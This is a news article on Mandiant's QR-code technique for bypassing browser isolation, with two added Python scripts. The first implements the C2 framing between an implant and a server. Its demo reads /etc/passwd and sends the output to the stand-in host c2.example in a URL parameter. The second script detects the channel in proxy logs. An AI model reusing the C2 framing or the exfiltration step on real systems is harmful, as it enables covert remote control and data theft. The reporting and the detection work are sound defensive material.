Researchers demonstrate a proof-of-concept cyberattack vector that gets around remote, on-premises, and local versions of browser isolation security technology to send malicious communications from an attacker-controlled server.
Security researchers have found a way to bypass three types of browser isolation, which would allow a cyberattacker to send malicious data to a remote device by using QR codes.
Researchers from Mandiant demonstrated a proof-of-concept (PoC) that gets around remote, on-premises, and local browser isolation by moving the data that would normally travel in HTTP responses into machine-readable QR codes rendered on a webpage. In this way, the technique allows attackers to send commands from a command-and-control (C2) server to a victim’s device.
Browser isolation is often used by organizations to fight phishing threats, protect a device from browser-delivered attacks, and deter typical C2 tactics used by attackers. The technique runs a browser in a secure environment — such as a cloud server or virtual machine — and then streams the visual content to the user’s device.
When browser isolation is being used, the remote browser handles everything from page rendering to executing JavaScript, with only the visual appearance of the webpage sent back to the user’s local browser.
Because attackers typically move commands and output between a C2 server and a victim’s device in HTTP requests and responses, browser isolation makes it hard to control a device in the usual way. The HTTP response returned to the local browser contains only the streaming engine that renders the remote browser’s visual page contents, “and only a stream of pixels is sent to the local browser to visually render the webpage,” Mandiant principal security consultant Thibault Van Geluwe de Berlaere wrote in the post. “This prevents typical HTTP-based C2 because the local device cannot decode the HTTP response.”
Bypassing Browser Isolation With QR Codes
Mandiant researchers developed a PoC that demonstrates how to get around browser isolation using the Puppeteer JavaScript library and the Google Chrome browser in headless mode. However, any modern browser can be used to achieve the PoC, Van Geluwe de Berlaere noted.
Instead of returning the C2 data in the HTTP response headers or body, as a conventional C2 server would, the attacker-controlled server returns a valid webpage that visually shows a QR code. “The implant then uses a local headless browser … to render the page, grabs a screenshot, and reads the QR code to retrieve the embedded data,” Van Geluwe de Berlaere wrote.
“By taking advantage of machine-readable QR codes, an attacker can send data from the attacker-controlled server to a malicious implant even when the webpage is rendered in a remote browser.”
In the attack sequence, the implant first drives the local browser to navigate, through the browser isolation’s pixel-streaming engine, to a URL on the C2 server. The remote browser fetches that URL, and the C2 server returns a valid HTML webpage with the command data encoded in a QR code visually shown on the page.
The remote browser then returns the pixel-streaming engine to the local browser, starting a visual stream of the rendered page obtained from the C2 server. The implant waits for the page to fully render, grabs a screenshot of the local browser that contains the QR code, decodes the command from it, and executes the command on the compromised device.
The implant then goes through the local browser again to navigate to a new URL that includes the command output encoded in a URL parameter. This parameter is passed through to the remote browser and ultimately to the C2 server, which decodes the command output as in traditional HTTP-based C2.
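The framing underneath that sequence, as an added example in Python rather than Mandiant’s PoC code: the server side decides what the QR code on the page carries and how output comes back in a URL parameter, and the implant side reassembles a command that does not fit in one code. The screenshot-and-decode step is stood in for by handing the QR payload string straight to the implant, so no QR library is assumed; the page’s `renderQR` function and `/static/qr.js` are hypothetical names for whatever client-side QR encoder the page would load, and the 2,189-byte cap is the per-code limit the researchers reported.

```python
"""
Data framing for the QR-code C2 channel (added example, not Mandiant's PoC).

Server side: split a command into QR-sized frames, serve a page that draws one
frame as a QR code, and parse command output out of a URL query parameter.
Implant side: reassemble the frames and build the output URL. The screenshot
and QR decode are stood in for by passing the payload string directly.
"""
import base64
import json
from urllib.parse import parse_qs, urlencode, urlparse

MAX_QR_BYTES = 2189  # largest payload that survived the pixel stream reliably

# ---- C2 server side ------------------------------------------------------

def split_command(command, limit=MAX_QR_BYTES):
    """Split a command into sequence-numbered QR payloads, each <= limit bytes.

    The command is base64-encoded first (only byte-mode-safe characters reach
    the QR encoder) and wrapped in a JSON envelope {"i": index, "n": total,
    "d": data}; the envelope size is reserved assuming up to 999 frames.
    """
    b64 = base64.b64encode(command.encode()).decode("ascii")
    envelope = len(json.dumps({"i": 999, "n": 999, "d": ""}, separators=(",", ":")))
    size = limit - envelope
    pieces = [b64[k:k + size] for k in range(0, len(b64), size)] or [""]
    return [json.dumps({"i": i, "n": len(pieces), "d": p}, separators=(",", ":"))
            for i, p in enumerate(pieces)]

def build_task_page(payload):
    """Valid HTML page whose only visible content is the QR code.

    The remote browser receives this body (so remote-side DLP could inspect
    it); the local browser only ever receives pixels. renderQR and
    /static/qr.js are hypothetical stand-ins for a client-side QR encoder.
    """
    return (
        "<!doctype html><html><body>"
        '<div id="qr"></div>'
        '<script src="/static/qr.js"></script>'
        f"<script>renderQR(document.getElementById('qr'), {json.dumps(payload)});</script>"
        "</body></html>"
    )

def parse_result(url):
    """Recover command output from the URL the implant navigated to."""
    token = parse_qs(urlparse(url).query)["o"][0]
    return base64.urlsafe_b64decode(token + "=" * (-len(token) % 4))

# ---- implant side --------------------------------------------------------

def reassemble_command(payloads):
    """Join decoded QR payloads back into the command; fail on missing frames."""
    frames = [json.loads(p) for p in payloads]
    total = frames[0]["n"]
    by_index = {f["i"]: f["d"] for f in frames if f["n"] == total}
    if sorted(by_index) != list(range(total)):
        raise ValueError("missing or inconsistent QR frames")
    return base64.b64decode("".join(by_index[i] for i in range(total))).decode()

def build_result_url(c2_base, output):
    """Output rides back in a query parameter that the remote browser passes
    through to the C2 server unchanged. Large output would need chunking too."""
    token = base64.urlsafe_b64encode(output).decode("ascii").rstrip("=")
    return f"{c2_base}/r?{urlencode({'o': token})}"

if __name__ == "__main__":
    command = "cat /etc/passwd && " + "echo padding;" * 500  # oversized on purpose
    frames = split_command(command)
    print(len(frames), "QR frames of", [len(f) for f in frames], "bytes")
    print(build_task_page(frames[0])[:110], "...")
    assert reassemble_command(frames) == command
    url = build_result_url("https://c2.example", b"root:x:0:0:root:/root:/bin/bash\n")
    print(url[:70], "...", parse_result(url)[:6])
```

Every extra frame costs another full round trip through the remote browser, which is why the per-code cap matters: a command a few kilobytes long already takes several of the multi-second requests described below.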
Challenges to Implementing the Bypass
Though the PoC demonstrates how attackers can get around browser isolation, there are some limitations and challenges to consider when using it, the researchers noted.
One is that the PoC cannot use QR codes at their maximum capacity (2,953 bytes in a 177×177 module grid at error-correction level “L”), because “the visual stream of the webpage rendered in the local browser was of insufficient quality to reliably read the QR code contents,” Van Geluwe de Berlaere explained. Instead, the researchers capped each QR code at 2,189 bytes of content.
Moreover, each request takes at least five seconds to reliably display and scan the QR code, because of the processing overhead of running Chrome in headless mode, the time the remote browser needs to start up, page rendering, and the streaming of visual content from the remote browser back to the local browser. “This introduces significant latency in the C2 channel,” he wrote.
Finally, the PoC does not account for other security features of browser isolation, such as domain reputation, URL scanning, data-loss prevention, and request heuristics, which an attacker would also have to get past if they are enabled in the target browser-isolation environment.
Despite the success of the bypass, Mandiant still recommends browser isolation as a strong protection measure against client-side browser exploitation and phishing attacks. However, Van Geluwe de Berlaere wrote, it should be used as one part of “a well-rounded cyber defense posture” that also includes monitoring for anomalous network traffic and for browsers running in automation mode, to defend against Web-based attacks.
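What that monitoring can look for, as an added example that is not part of Mandiant’s post or tooling: the channel described above leaves a browser in automation mode (headless Chrome announces itself with `HeadlessChrome/` in its user-agent string), a slow but regular request cadence to one host, and long opaque query parameters carrying command output. The script below runs those three checks over a constructed proxy-style log; the hosts, addresses, and log format are assumptions, and whether the destination URL is visible at all depends on where the isolation platform logs.

```python
"""
Detection sketch for the QR-code C2 channel (added example, not Mandiant code).

Three signals from a constructed proxy-style log:
  1. automation-mode browser: "HeadlessChrome/" in the user agent
  2. regular beaconing: near-constant spacing of requests to one host
  3. opaque query parameters: long, high-entropy values (the URL-parameter
     return path for command output)
Signals 2 and 3 on the same (source, host) pair form the high-confidence alert.
"""
import base64
import hashlib
import math
import re
import statistics
from collections import defaultdict
from datetime import datetime
from urllib.parse import parse_qs, urlparse

# constructed format: <iso timestamp> <src ip> "<user agent>" <url>
LINE_RE = re.compile(r'^(\S+) (\S+) "([^"]*)" (\S+)$')

def parse_log(text):
    events = []
    for line in text.strip().splitlines():
        m = LINE_RE.match(line)
        if m:
            ts, src, ua, url = m.groups()
            events.append({"ts": datetime.fromisoformat(ts), "src": src, "ua": ua, "url": url})
    return events

def shannon_entropy(s):
    """Bits per character; base64 blobs score far above words or slugs."""
    counts = {c: s.count(c) for c in set(s)}
    return -sum(n / len(s) * math.log2(n / len(s)) for n in counts.values())

def opaque_params(url, min_len=40, min_entropy=3.5):
    """Names of query parameters whose values look like encoded blobs."""
    return [name for name, values in parse_qs(urlparse(url).query).items()
            for v in values if len(v) >= min_len and shannon_entropy(v) >= min_entropy]

def headless_clients(events):
    return {(e["src"], e["ua"]) for e in events if "HeadlessChrome/" in e["ua"]}

def regular_beacons(events, min_count=4, max_jitter=1.0):
    """(src, host, mean gap in seconds) for request trains with steady spacing."""
    series = defaultdict(list)
    for e in events:
        series[(e["src"], urlparse(e["url"]).hostname)].append(e["ts"])
    found = []
    for (src, host), stamps in series.items():
        if len(stamps) < min_count:
            continue
        stamps.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(stamps, stamps[1:])]
        if statistics.pstdev(gaps) <= max_jitter:
            found.append((src, host, statistics.mean(gaps)))
    return found

def detect(text):
    events = parse_log(text)
    exfil = {(e["src"], urlparse(e["url"]).hostname) for e in events if opaque_params(e["url"])}
    beacons = [(s, h, g) for s, h, g in regular_beacons(events) if (s, h) in exfil]
    return {"headless": headless_clients(events), "beacons": beacons}

def make_sample_log():
    """Constructed log: one implant beaconing every ~5 s, one ordinary user."""
    head_ua = ("Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) "
               "HeadlessChrome/124.0.0.0 Safari/537.36")
    user_ua = ("Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) "
               "Chrome/124.0.0.0 Safari/537.36")
    lines = []
    for i, sec in enumerate([0, 5, 10, 16, 21, 26]):  # ~5 s cadence with jitter
        blob = hashlib.sha256(f"output-{i}".encode()).digest() + hashlib.sha256(f"more-{i}".encode()).digest()
        token = base64.urlsafe_b64encode(blob).decode().rstrip("=")
        lines.append(f'2024-12-10T10:00:{sec:02d}+00:00 10.0.0.5 "{head_ua}" https://c2.example/r?o={token}')
    for sec, path in [(0, "/"), (7, "/search?q=browser+isolation"), (9, "/docs"), (30, "/login")]:
        lines.append(f'2024-12-10T10:00:{sec:02d}+00:00 10.0.0.7 "{user_ua}" https://www.example.com{path}')
    return "\n".join(lines)

if __name__ == "__main__":
    for key, hits in detect(make_sample_log()).items():
        print(key, hits)
```

The user-agent check is the weakest of the three: an implant driving Puppeteer can set any user-agent string it likes, so treat it as corroboration rather than a trigger. The cadence and opaque-parameter checks follow from how the channel has to work, and the five-second-plus latency noted above makes the beacon interval comparatively easy to spot against normal browsing.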